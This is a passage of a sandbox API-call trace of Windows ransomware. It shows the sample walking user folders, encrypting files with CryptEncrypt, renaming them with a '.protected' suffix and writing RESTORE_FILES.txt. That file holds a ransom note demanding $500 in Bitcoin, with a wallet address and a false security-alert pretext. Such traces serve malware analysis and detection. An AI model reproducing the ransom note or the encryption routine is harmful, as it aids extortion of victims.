hTemplateFile=0x0) returned 0xd8 [0093.599] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.599] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0093.602] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0093.603] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0093.603] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.603] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0093.603] CloseHandle (hObject=0xd8) returned 1 [0093.603] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.603] lstrcmpiW (lpString1="Feeds Cache", lpString2="Windows") returned -1 [0093.603] lstrcmpiW (lpString1="Feeds Cache", lpString2="Program Files") returned -1 [0093.603] lstrcmpiW (lpString1="Feeds Cache", lpString2="Program Files (x86)") returned -1 [0093.603] lstrcmpiW (lpString1="Feeds Cache", lpString2="$Recycle.bin") returned 1 [0093.603] lstrcmpiW (lpString1="Feeds Cache", lpString2="System Volume Information") returned -1 [0093.603] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache") returned 56 [0093.603] lstrcmpW (lpString1="Feeds Cache", lpString2=".") returned 1 [0093.603] lstrcmpW (lpString1="Feeds Cache", lpString2="..") returned 1 [0093.603] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\*") returned 58 [0093.603] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.609] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.609] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.609] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.609] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.609] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.609] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\.") returned 58 [0093.609] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.609] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.609] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.609] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.609] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.609] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.610] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.610] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.610] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.610] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.610] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.610] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.610] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\..") returned 59 [0093.610] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.610] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.610] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.610] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.610] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.610] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\.." (normalized: "c:\\users\\default\\appdata\\local\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.610] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.610] lstrcmpiW (lpString1="1NBUR4HR", lpString2="Windows") returned -1 [0093.610] lstrcmpiW (lpString1="1NBUR4HR", lpString2="Program Files") returned -1 [0093.610] lstrcmpiW (lpString1="1NBUR4HR", lpString2="Program Files (x86)") returned -1 [0093.610] lstrcmpiW (lpString1="1NBUR4HR", lpString2="$Recycle.bin") returned 1 [0093.610] lstrcmpiW (lpString1="1NBUR4HR", lpString2="System Volume Information") returned -1 [0093.610] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR") returned 65 [0093.610] lstrcmpW (lpString1="1NBUR4HR", lpString2=".") returned 1 [0093.610] lstrcmpW (lpString1="1NBUR4HR", lpString2="..") returned 1 [0093.610] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\*") returned 67 [0093.610] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0093.610] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.611] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.611] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.611] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.611] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.611] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\.") returned 67 [0093.611] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.611] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0093.611] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0093.611] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.611] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.611] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.611] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.611] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.611] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.611] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.611] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.611] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\..") returned 68 [0093.611] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.611] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.611] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0093.611] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0093.611] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.611] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\.." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.611] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.611] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0093.611] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0093.611] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0093.611] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0093.611] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0093.611] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini") returned 77 [0093.611] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0093.611] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0093.612] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.612] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.612] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.612] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini") returned 77 [0093.612] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0093.612] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini") returned 77 [0093.612] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0093.612] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini") returned 77 [0093.612] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0093.613] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0093.613] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.613] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0093.613] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.613] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.613] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.614] CloseHandle (hObject=0x150) returned 1 [0093.614] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini.protected") returned 87 [0093.614] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini.protected")) returned 1 [0093.618] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0093.618] lstrcmpiW (lpString1="fwlink[1]", lpString2="Windows") returned -1 [0093.618] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files") returned -1 [0093.618] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files (x86)") returned -1 [0093.618] lstrcmpiW (lpString1="fwlink[1]", lpString2="$Recycle.bin") returned 1 [0093.618] lstrcmpiW (lpString1="fwlink[1]", lpString2="System Volume Information") returned -1 [0093.618] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]") returned 75 [0093.618] StrStrIW (lpFirst="fwlink[1]", lpSrch=".protected") returned 0x0 [0093.618] lstrcmpW (lpString1="fwlink[1]", lpString2="RESTORE_FILES.txt") returned -1 [0093.618] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0093.618] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0093.618] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0093.619] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]") returned 75 [0093.619] StrStrW (lpFirst="fwlink[1]", lpSrch=".txt") returned 0x0 [0093.619] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]") returned 75 [0093.619] StrStrW (lpFirst="fwlink[1]", lpSrch=".rar") returned 0x0 [0093.619] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]") returned 75 [0093.619] StrStrW (lpFirst="fwlink[1]", lpSrch=".zip") returned 0x0 [0093.619] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0093.619] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.619] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0093.619] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.620] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.620] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.620] CloseHandle (hObject=0x150) returned 1 [0093.620] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1].protected") returned 85 [0093.620] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1]"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1].protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1].protected")) returned 1 [0093.621] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.621] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.621] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\RESTORE_FILES.txt") returned 83 [0093.621] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.648] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.648] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0093.648] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0093.648] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0093.649] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.649] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0093.649] CloseHandle (hObject=0x14c) returned 1 [0093.649] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.649] lstrcmpiW (lpString1="6ASVN7J7", lpString2="Windows") returned -1 [0093.649] lstrcmpiW (lpString1="6ASVN7J7", lpString2="Program Files") returned -1 [0093.650] lstrcmpiW (lpString1="6ASVN7J7", lpString2="Program Files (x86)") returned -1 [0093.650] lstrcmpiW (lpString1="6ASVN7J7", lpString2="$Recycle.bin") returned 1 [0093.650] lstrcmpiW (lpString1="6ASVN7J7", lpString2="System Volume Information") returned -1 [0093.650] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7") returned 65 [0093.650] lstrcmpW (lpString1="6ASVN7J7", lpString2=".") returned 1 [0093.650] lstrcmpW (lpString1="6ASVN7J7", lpString2="..") returned 1 [0093.650] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\*") returned 67 [0093.650] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\*", lpFindFileData=0x295e7d0 | out: 